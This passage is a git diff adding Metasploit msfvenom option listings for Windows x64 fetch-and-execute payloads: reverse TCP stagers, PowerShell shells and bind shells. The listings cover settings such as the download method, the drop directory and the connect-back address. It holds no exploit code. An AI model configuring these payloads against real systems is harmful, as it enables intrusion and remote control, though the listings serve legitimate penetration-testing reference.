@@ -0,0 +1,87 @@ + + Name: HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/peinject/reverse_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + ege + hdm + skape + sf + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME ZJnfcHNf no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +PE yes The local path to the PE file to upload +RC4PASSWORD msf yes Password to derive RC4 key from + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + 
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp_uuid.txt new file mode 100644 index 0000000..014e4b1 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp_uuid.txt 
@@ -0,0 +1,82 @@ + + Name: HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/peinject/reverse_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + ege + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME YPbMuQaXwL no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +PE yes The local path to the PE file to upload + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. 
+ Connect back to the attacker with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and 
run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-pingback_reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-pingback_reverse_tcp.txt new file mode 100644 index 0000000..a1411d4 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-pingback_reverse_tcp.txt 
@@ -0,0 +1,71 @@ + + Name: HTTP Fetch, Windows x64 Pingback, Reverse TCP Inline + Module: payload/cmd/windows/http/x64/pingback_reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME digkVfDgI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and report UUID (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. 
+ EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-windows-http-x64-powershell_bind_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-powershell_bind_tcp.txt new file mode 100644 index 0000000..f7e4f1e --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-powershell_bind_tcp.txt 
@@ -0,0 +1,64 @@ + + Name: HTTP Fetch + Module: payload/cmd/windows/http/x64/powershell_bind_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + Ben Turner + Dave Hardy + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME MtJgQqcelFDr no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LOAD_MODULES no A list of powershell modules separated by a comma to download over the web +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. 
+ EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-powershell_reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-powershell_reverse_tcp.txt new file mode 100644 index 0000000..946fa4b --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-powershell_reverse_tcp.txt 
@@ -0,0 +1,71 @@ + + Name: HTTP Fetch + Module: payload/cmd/windows/http/x64/powershell_reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + Ben Turner + Dave Hardy + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME IZnoyzaDb no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LOAD_MODULES no A list of powershell modules separated by a comma to download over the web +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. 
+ EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-powershell_reverse_tcp_ssl.txt b/msfvenom/payload_options/cmd-windows-http-x64-powershell_reverse_tcp_ssl.txt new file mode 100644 index 0000000..90cee0c --- /dev/null 
+++ b/msfvenom/payload_options/cmd-windows-http-x64-powershell_reverse_tcp_ssl.txt 
@@ -0,0 +1,73 @@ + + Name: HTTP Fetch + Module: payload/cmd/windows/http/x64/powershell_reverse_tcp_ssl + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + Ben Turner + Dave Hardy + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME RhhhFNCfU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LOAD_MODULES no A list of powershell modules separated by a comma to download over the web +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. 
+ EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
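Review bot: the SSLVersion row in this hunk records SSL3, TLS1 and TLS1.1 as accepted values next to Auto and TLS1.2; since these files are verbatim tool output the row should stay as-is, but if this directory gets a README it is worth pointing readers at Auto or TLS1.2 and noting that HandlerSSLCert (no default here, "Path to a SSL certificate in unified PEM format") is the option that controls which certificate the listener presents, which matters for anyone reviewing or fingerprinting handler traffic in a lab.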
diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_ipv6_tcp.txt new file mode 100644 index 0000000..62e1877 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_ipv6_tcp.txt 
@@ -0,0 +1,78 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager + Module: payload/cmd/windows/http/x64/shell/bind_ipv6_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME nmfalUUhDk no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Listen for an IPv6 connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate 
false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..079b595 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_ipv6_tcp_uuid.txt 
@@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support + Module: payload/cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME jOSyoHRbgA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Listen for an IPv6 connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate 
false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_named_pipe.txt new file mode 100644 index 0000000..84d8800 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_named_pipe.txt 
@@ -0,0 +1,85 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager + Module: payload/cmd/windows/http/x64/shell/bind_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + sf + UserExistsError + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME ksbSMKfLkdnf no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 445 yes SMB port +PIPENAME msf-pipe yes Name of the pipe to connect to +RHOST no Host of the pipe to connect to +SMBDomain . no The Windows domain to use for authentication +SMBPass no The password for the specified username +SMBUser no The username to authenticate as + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Listen for a pipe connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to 